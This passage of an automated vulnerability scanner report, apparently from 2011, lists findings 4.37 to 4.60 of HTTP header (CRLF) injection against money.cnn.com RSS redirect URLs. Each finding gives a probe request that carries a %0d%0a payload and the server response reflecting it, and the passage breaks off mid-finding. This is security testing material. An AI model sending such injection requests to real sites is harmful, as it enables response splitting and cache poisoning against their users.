GET /rssclick/2011/05/03/pf/b3cce%0d%0a9574cc509ac/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b3cce
9574cc509ac
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b3cce
9574c
...[SNIP]...

4.37. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a510a%0d%0a638aad50604 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/high_gas_prices_hurt/a510a%0d%0a638aad50604 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/high_gas_prices_hurt/a510a
638aad50604

Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/high_gas_pri
...[SNIP]...

4.38. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7112f%0d%0a0257b7a00de was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/7112f%0d%0a0257b7a00de/05/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:38 GMT
Server: Apache
Location: http://money.cnn.com/7112f
0257b7a00de
/05/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/7112f
0257b7a00de/05/03/p
...[SNIP]...

4.39. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 73b9f%0d%0a39944a406a4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/73b9f%0d%0a39944a406a4/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/73b9f
39944a406a4
/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/73b9f
39944a406a4/03
...[SNIP]...

4.40. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cc226%0d%0a09f5b65eab6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/cc226%0d%0a09f5b65eab6/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/cc226
09f5b65eab6
/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/cc226
09f5b65eab6
...[SNIP]...

4.41. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d94a7%0d%0aefdca2f4b0 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d94a7%0d%0aefdca2f4b0/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d94a7
efdca2f4b0
/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d94a7
efdca2f4
...[SNIP]...

4.42. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b0d38%0d%0aef7cdccc242 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/b0d38%0d%0aef7cdccc242/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b0d38
ef7cdccc242
/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b0d38
ef7cd
...[SNIP]...

4.43. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 386d0%0d%0ac1a44c784d0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/386d0%0d%0ac1a44c784d0/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/386d0
c1a44c784d0
/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/386d0
...[SNIP]...

4.44. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 944bb%0d%0a0c205831719 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/944bb%0d%0a0c205831719 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/caeer_goals.moneymag/944bb
0c205831719

Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/caeer
...[SNIP]...

4.45. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c481b%0d%0aecc7502831d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c481b%0d%0aecc7502831d/05/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/c481b
ecc7502831d
/05/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c481b
ecc7502831d/05/03/r
...[SNIP]...

4.46. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d41cf%0d%0a7cc224e605c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/d41cf%0d%0a7cc224e605c/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/d41cf
7cc224e605c
/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/d41cf
7cc224e605c/03
...[SNIP]...

4.47. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload a6396%0d%0a54e70abbb70 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/a6396%0d%0a54e70abbb70/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/a6396
54e70abbb70
/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/a6396
54e70abbb70
...[SNIP]...

4.48. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 50372%0d%0ad71e5693a3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/50372%0d%0ad71e5693a3/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/50372
d71e5693a3
/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 336
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/50372
d71e5693
...[SNIP]...

4.49. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b4e20%0d%0a9e160d42c7 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/b4e20%0d%0a9e160d42c7/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/b4e20
9e160d42c7
/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/b4e2
...[SNIP]...

4.50. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload e7a9b%0d%0a2e6c28b0e33 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b%0d%0a2e6c28b0e33 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b
2e6c28b0e33

Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/inhe
...[SNIP]...

4.51. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cfaee%0d%0a97890f9f395 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/cfaee%0d%0a97890f9f395/05/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/cfaee
97890f9f395
/05/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/cfaee
97890f9f395/05/04/a
...[SNIP]...

4.52. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 276a0%0d%0a4319be5c91a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/276a0%0d%0a4319be5c91a/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/276a0
4319be5c91a
/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/276a0
4319be5c91a/04
...[SNIP]...

4.53. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 1a2b5%0d%0af12b48cd4a1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/1a2b5%0d%0af12b48cd4a1/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1
/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1
...[SNIP]...

4.54. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f9e29%0d%0a96eb2cc6b99 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/f9e29%0d%0a96eb2cc6b99/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/f9e29
96eb2cc6b99
/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/f9e29
96eb2cc6
...[SNIP]...

4.55. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload cec6e%0d%0a52d76717a7c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cec6e%0d%0a52d76717a7c/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cec6e
52d76717a7c
/index.htm
Vary: Accept-Encoding
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cec6e
52
...[SNIP]...

4.56. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload fd42d%0d%0a71f9eeb8f02 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cruz_recall/fd42d%0d%0a71f9eeb8f02 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cruz_recall/fd42d
71f9eeb8f02

Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cruz_reca
...[SNIP]...

4.57. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 93492%0d%0ae298c488f49 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/93492%0d%0ae298c488f49/05/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/93492
e298c488f49
/05/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/93492
e298c488f49/05/04/m
...[SNIP]...

4.58. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 9b7de%0d%0af142d288158 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/9b7de%0d%0af142d288158/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/9b7de
f142d288158
/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/9b7de
f142d288158/04
...[SNIP]...

4.59. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 28f2d%0d%0ae137b1948d1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/28f2d%0d%0ae137b1948d1/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/28f2d
e137b1948d1
/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/28f2d
e137b1948d1
...[SNIP]...

4.60. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 624dd%0d%0a7a44fd8182c was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/624dd%0d%0a7a44fd8182c/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
